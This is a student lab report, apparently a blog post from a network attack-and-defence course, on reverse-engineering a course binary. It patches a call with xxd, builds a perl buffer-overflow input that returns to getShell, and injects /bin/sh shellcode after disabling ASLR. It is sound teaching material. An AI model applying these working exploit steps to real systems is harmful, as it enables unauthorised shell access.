2018-2019-2 网络对抗技术 20165305 Exp1 PC平台逆向破解

实验1-1直接修改程序机器指令,改变程序执行流程

先输入objdump -d 20165305pwn2查看反汇编代码,然后查看机器指令,找到并根据机器指令计算出要篡改的目标地址。
我们可以从下图中看到call 804891的
机器码指令为e8 d7 ff ff ff,然后我们可以通过知道,只要把d7改为c3就可以在运行文件时调用getshell。

以下是我要执行的一系列指令
首先输入vi 20165305pwn2(进入编辑文件模式)——>:%!xxd(将文件转换为16进制)——>/e8 d7(找到对应的机器指令)——>先点击回车,然后修改d7为c3——>:%!xxd -r(将16进制数转换为原来的样子)——>:wq(保存)——>./20165305pwn2(运行文件)——>ls(执行ls功能,看实验是否成功)。

实验1-2通过构造输入参数,造成BOF攻击,改变程序执行流

在课上老师为我们演示了如何知道应该输入多少位数才能够覆盖返回地址,在这里我就不多说了。
getShell的内存地址,通过反汇编时可以看到,即0804847d。
以下是我执行的一系列指令:
gdb 20165305pwn2(进入gdb调试)——>r——>输入111111112222222233333333444444441234这36位数(测试是否会造成缓冲区溢出),查看是哪几位数造成缓冲区溢出——>退出gdb调试——>perl -e 'print "11111111222222223333333344444444\x7d\x84\x04\x08\x0a"' > input(用getShell的内存地址代替1234,因为终端不让输入地址,所以构造一个input文件)——>(cat input;cat) | ./20165305pwn2(执行程序)——>ls(查看是否攻击成功)。

之前我尝试了一下输入的数字位数大于36位看可不可以覆盖返回地址,但是总会报错,好像是不让执行,所以我就直接入了36位数字

实验1-3注入Shellcode并执行

目的:为了直接在终端注入一段机器指令,获取一个交互式的shell
以下是我执行的一系列指令

apt-get install execstack(安装execstack)——>execstack -s 20165305pwn2(设置堆栈可执行)设置堆栈可执行 ——>execstack -q 20165305pwn2 (查询文件的堆栈是否可执行)——>echo "0" > /proc/sys/kernel/randomize_va_space (关闭地址随机化)——>perl -e 'print "A" x 32;print "\x4\x3\x2\x1\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x90\x00\xd3\xff\xff\x00"' > input_shellcode(编写shellcode) ——>(cat input_shellcode;cat) | ./20165305pwn2(注入shellcode)——>打开另一个终端,输入口ps -ef | grep 201653056pwn2——>attach 进程号——> disassemble foo(反编译)——>break *0x080484ae(设置断点)——>c——>info r esp(查看esp)——>x/16x 0xbffff25c(根据地址,查看其存放内容)——>退出gdb调试——>perl -e 'print "A" x 32;print "\x60\xf2\xff\xbf\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x90\x00\xd3\xff\xff\x00"' > input_shellcode(根据地址计算出要注入的地址,并编写input_shellcode)——>xxd input_shellcode——>(cat input_shellcode;cat) | ./20165305pwn2(注入shellcode)——>回车输入ls查看结果。

问题

什么是漏洞?漏洞有什么危害?
我认为漏洞就是在使用程序的过程中暴露出来的一些问题,这是由于在设计程序时没有考虑到的不足之处。
危害:我认为一般可以通过漏洞使程序崩溃、瘫痪,还可以通过漏洞获取一定的非法权限等等。

实验收获与感想

通过本次实验,让我掌握了缓冲区溢出攻击的一些基本知识与操作,并且为以后的学习打下了基础。为了掌握更多的知识,今后我会更加努力地学习。

2018-2019-2 网络对抗技术 20165305 Exp1 PC平台逆向破解的更多相关文章

  1. 20165221 《网络对抗技术》EXP1 PC平台逆向破解

    20165221 <网络对抗技术>EXP1 PC平台逆向破解 一.实验内容 本次实践的对象是一个名为pwn1的linux可执行文件. 该程序正常执行流程是:main调用foo函数,foo函 ...

  2. 2018-2019-2 网络对抗技术 20165325 Exp1 PC平台逆向破解

    2018-2019-2 网络对抗技术 20165325 Exp1 PC平台逆向破解(BOF实验) 实验有三个模块: (一)直接修改程序机器指令,改变程序执行流程: (二)通过构造输入参数,造成BOF攻 ...

  3. 2018-2019-2 20165206《网络对抗技术》Exp1 PC平台逆向破解

    - 2018-2019-2 20165206<网络对抗技术>Exp1 PC平台逆向破解 - 实验任务 本次实践的对象是一个名为pwn1的linux可执行文件. 该程序正常执行流程是:mai ...

  4. 2018-2019-2 20165317《网络对抗技术》Exp1 PC平台逆向破解

    2018-2019-2 20165317<网络对抗技术>Exp1 PC平台逆向破解 实验目的 掌握NOP, JNE, JE, JMP, CMP汇编指令的机器码 NOP:无作用,英文&quo ...

  5. 2018-2019-2 网络对抗技术 20165336 Exp1 PC平台逆向破解

    2018-2019-2 网络对抗技术 20165336 Exp1 PC平台逆向破解 1. 逆向及Bof基础实践说明 1.1 实践目标 本次实践的对象是一个名为pwn1的linux可执行文件.该程序正常 ...

  6. 2018-2019-2 《网络对抗技术》 Exp1 PC平台逆向破解 20165215

    2018-2019-2 <网络对抗技术> Exp1 PC平台逆向破解 20165215 目录 知识点描述 实验步骤 (一)直接修改程序机器指令,改变程序执行流程 (二)通过构造输入参数,造 ...

  7. 2018-2019-2 20165316 《网络对抗技术》Exp1 PC平台逆向破解

    2018-2019-2 20165316 <网络对抗技术>Exp1 PC平台逆向破解 1 逆向及Bof基础实践说明 1.1 实践目标 本次实践的对象是一个名为pwn1的linux可执行文件 ...

  8. 20165214 2018-2019-2 《网络对抗技术》Exp1 PC平台逆向破解 Week3

    <网络对抗技术>Exp1 PC平台逆向破解之"逆向及Bof基础实践说明" Week3 一. 实验预习 1.什么是漏洞?漏洞有什么危害? 漏洞就是在计算机硬件.软件.协议 ...

  9. 2018-2019-2 网络对抗技术 20165228 Exp1 PC平台逆向破解

    2018-2019-2 网络对抗技术 20165228 Exp1 PC平台逆向破解 实验内容及步骤 第一部分:直接修改程序机器指令,改变程序执行流程 关键:通过修改call指令跳转的地址,将原本指向被 ...

随机推荐

  1. js 改变只读属性的值

    console.log(navigator.platform); // Win32 Object.defineProperty(navigator, 'platform', { value: 'cc' ...

  2. SQL - 1.区分login、user、schema和role

        Login Login 是Server一级的概念,表示登录Server的凭证,比如在Server_A上有一个数据库DA,那么想要访问数据库DA,第一步要做的事情就是先登录到Hosting该数据 ...

  3. CAD数据导入Arcgis10.1的依赖关系

    这段时间在做基于Arcgis10.1API处理AutoCAD图纸数据并将处理后的数据坐标转换为xml文件,以便于在开发的项目中使用.通过这段时间的开发总结以下问题希望能对童鞋有所帮助: 1.遇到CAD ...

  4. linux CentOS

    CentOS中由一般用户切换为root用户 1.打开终端,提示符为“$”,表明该用户为普通用户,此时,直接输su,回车,输入root密码,回车,就可以切换到root用户下,此时的提示符变为“#”. 注 ...

  5. python基础5 while循环

    一.while循环: while  条件: 代码块 例: n=0 while n<10: print(n) n=n+1   #n自加1 ,满足n<10,继续循环 输出结果: 1 2 3 4 ...

  6. 找出sql脚本中需要创建的表空间名称和数据库用户名

    测试的工作中,经常会遇到项目交接或者搭建一个新的测试环境,而创建oracle数据库用户及表空间时,需要提前找出脚本中的 数据库用户名和表空间名,所以自己写了一个python脚本,自动找出sql脚本中的 ...

  7. Linux下进程和端口常用操作

    https://blog.csdn.net/s573626822/article/details/80680456

  8. Rabbit MQ 消息确认和持久化机制

    一:确认种类 RabbitMQ的消息确认有两种.一种是消息发送确认,用来确认生产者将消息发送给交换器,交换器传递给队列的过程中消息是否成功投递.发送确认分为两步,一是确认是否到达交换器,二是确认是否到 ...

  9. 04.常量变量和数据类型(const)

    1.关键字 2.数据类型 告诉编译器定义一个类型变量的空间! 3.常量 4.变量 在程序运行过程中,值可以改变 变量在使用前必须先定义,定义变量前必须有相应的数据类型 标识符命名规则: (1).标识符 ...

  10. kubernetes集群应用部署实例

    今天,我们将要带来入门hello world示例,它是一个web留言板应用,基于PHP+Redis的两层分布式架构的web应用,前端PHP web网站通过访问后端Redis数据库完成用户留言的查询和添 ...